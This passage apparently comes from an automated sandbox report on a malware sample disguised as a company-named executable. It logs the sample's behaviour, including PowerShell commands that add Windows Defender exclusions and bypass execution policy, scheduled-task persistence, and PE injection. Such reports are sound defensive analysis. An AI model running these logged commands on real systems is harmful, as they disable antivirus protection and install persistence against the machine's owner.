              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeThread delayed: delay time: 922337203685477
              Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000009.00000002.4523604892.000000000160A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Adds a directory exclusion to Windows Defender
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe"
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTUZKYTc.exe"
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe'
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe'
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe"Jump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTUZKYTc.exe"Jump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe'Jump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe'Jump to behavior
              Bypasses PowerShell execution policy
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe'
              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeMemory written: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeMemory written: C:\Users\user\AppData\Roaming\RTUZKYTc.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory written: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory written: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe"Jump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTUZKYTc.exe"Jump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmp960E.tmp"Jump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe"Jump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe'Jump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SS Bottmac Engineers Pvt. Ltd..exe'Jump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe'Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmpAD5E.tmp"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess created: C:\Users\user\AppData\Roaming\RTUZKYTc.exe "C:\Users\user\AppData\Roaming\RTUZKYTc.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmpE6A.tmp"
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmp2E66.tmp"
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeQueries volume information: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeQueries volume information: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
